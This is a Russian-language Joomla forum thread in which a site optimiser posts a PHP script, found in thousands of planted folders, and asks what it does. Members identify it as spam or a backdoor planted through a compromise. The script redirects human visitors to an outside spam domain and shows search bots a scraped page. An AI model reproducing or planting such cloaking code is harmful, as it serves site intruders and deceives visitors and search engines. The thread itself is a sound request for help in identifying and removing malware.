0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 390 Просмотров
*

katalog_2003

  • Захожу иногда
  • 70
  • 0 / 0
не могу понять что за скрипт может кто подскажет  спасибо

<?php


$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']);
if((strpos($tmp, 'bot')!= true)){
header('location:http://deskincream2016.lori-ellis.com/');
exit;
}


function gethttpcnt($url,$username = '',$password = '',$timeout = 10){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$cnt = curl_exec($ch);
curl_close($ch);
return $cnt;
}
 $fromsite="http://www.fitforfun.de/beauty-wellness/haut-haare/pigmentflecken/hautprobleme_aid_5500.html";
 $website="http://www.fitforfun.de/";

 $ss=$_SERVER['PHP_SELF'];
 $ss=str_replace("index.php","",$ss);
 $otherstring=$fromsite;
 
 $content=gethttpcnt($otherstring);
 $content=str_replace("\"images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"/includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"../includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"min/","\"" . $website . "min/",$content);
 $content=str_replace("\"media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"/css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"../css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"js/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/js/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../js/","\"" . $website . "/images/",$content);
 $content=str_replace("'images/","'" . $website . "/images/",$content);
 $content=str_replace("'/images/","'" . $website . "/images/",$content);
 $content=str_replace("'../images/","'" . $website . "/images/",$content);
 $content=str_replace("'Images/","'" . $website . "/images/",$content);
 $content=str_replace("'/Images/","'" . $website . "/images/",$content);
 $content=str_replace("'../Images/","'" . $website . "/images/",$content);
 $content=str_replace("'includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'/includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'../includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'min/","'" . $website . "min/",$content);
 $content=str_replace("'media/","'" . $website . "/images/",$content);
 $content=str_replace("'/media/","'" . $website . "/images/",$content);
 $content=str_replace("'../media/","'" . $website . "/images/",$content);
 $content=str_replace("'skin/","'" . $website . "/images/",$content);
 $content=str_replace("'/skin/","'" . $website . "/images/",$content);
 $content=str_replace("'../skin/","'" . $website . "/images/",$content);
 $content=str_replace("'js/","'" . $website . "/images/",$content);
 $content=str_replace("'/js/","'" . $website . "/images/",$content);
 $content=str_replace("'../js/","'" . $website . "/images/",$content);
 $content=str_replace('href="/','href="' . $website,$content);
 $content=str_replace('"' . $fromsite . '"','"' . $_SERVER['HTTP_HOST'] . $ss . '"',$content);
 $content=str_replace("'" . $fromsite . "'","'" . $_SERVER['HTTP_HOST'] . $ss . "'",$content);
 echo $content;
?>
*

robert

  • Живу я здесь
  • 4558
  • 426 / 16
Вы лучше сначала расскажите, чем этот скрипт вам интересен, потому что, скорее всего, он создан не для благих целей. Он вам как-то вредит или вы хотите его использовать?
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
*

beliyadm

  • Легенда
  • 8830
  • 1622 / 63
  • Севастополь == Россия
Шаблон качался с варезного ресурса? Вот и скрипт спамерский. Либо просто скрытая реклама либо бекдор глубже лежит
Все истины, которые я хочу вам изложить, — бесстыдная ложь.
Записки нетрезвого кодера || -=Joomla FAQ=- || -=все плохо=- || skype: beliyadm_pb
*

draff

  • Живу я здесь
  • 3344
  • 218 / 6
  • Ищу работу
Ну почему сразу варезный. Я встречал и в бесплатных расширениях рекламу.
В скрипте много вставок на сайты. И другой вопрос- дата создания скрипта, и с каким расширением этот скрипт появился в файлах сайта. Или хакер получил доступ к хостингу - и внедрил этот скрипт.
Удалю вирус, js miner с сайта. Обновление Virtuemart. Тема в коммерческом разделе     |    Отзывы
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

beliyadm

  • Легенда
  • 8830
  • 1622 / 63
  • Севастополь == Россия
Ну почему сразу варезный. Я встречал и в бесплатных расширениях рекламу.
В бесплатных расширениях реклама открытая, а не укрыта base64 или другими скрытыми способами. Я лично в бесплатных никогда не видел рекламы, кроме ссылки на сайт разработчика.
Все истины, которые я хочу вам изложить, — бесстыдная ложь.
Записки нетрезвого кодера || -=Joomla FAQ=- || -=все плохо=- || skype: beliyadm_pb
*

katalog_2003

  • Захожу иногда
  • 70
  • 0 / 0
Сайт был передан на оптимизацию вскрываю а там папок ba123 и т.д 3500 шт index.php в нутри
*

wishlight

  • Живу я здесь
  • 4143
  • 252 / 1
  • 300 руб очень быстрый хостинг в ЕС
*

katalog_2003

  • Захожу иногда
  • 70
  • 0 / 0
HaCkeD By Dr.Silnt HilL не знаете что это
*

dmitry_stas

  • Легенда
  • 11861
  • 1128 / 7
Явно ничего хорошего. Лечите сайт.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

robert

  • Живу я здесь
  • 4558
  • 426 / 16
HaCkeD By Dr.Silnt HilL не знаете что это
"Доктор Silnt HilL тебя поимел" - что-то вроде этого. Хотя он не такой уж крутой, судя по коду.
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Не могу установить украинский язык

Автор Harryk89

Ответов: 1
Просмотров: 69
Последний ответ 15.08.2018, 17:05:38
от kern.USR
Не могу создать/изменить категорию для пункта меню типа блог категории

Автор master-smeta

Ответов: 11
Просмотров: 510
Последний ответ 11.08.2018, 15:14:11
от lexxbry
Скрипт генерации turbo страниц для Яндекса

Автор ProtectYourSite

Ответов: 8
Просмотров: 948
Последний ответ 10.08.2018, 14:57:30
от ProtectYourSite
После установки https:// не могу редактировать изображения

Автор Vas80

Ответов: 3
Просмотров: 237
Последний ответ 18.07.2018, 04:11:31
от wishlight
Скрипт на обновление данных

Автор Dmitry2018

Ответов: 3
Просмотров: 59
Последний ответ 06.07.2018, 09:04:35
от Taatshi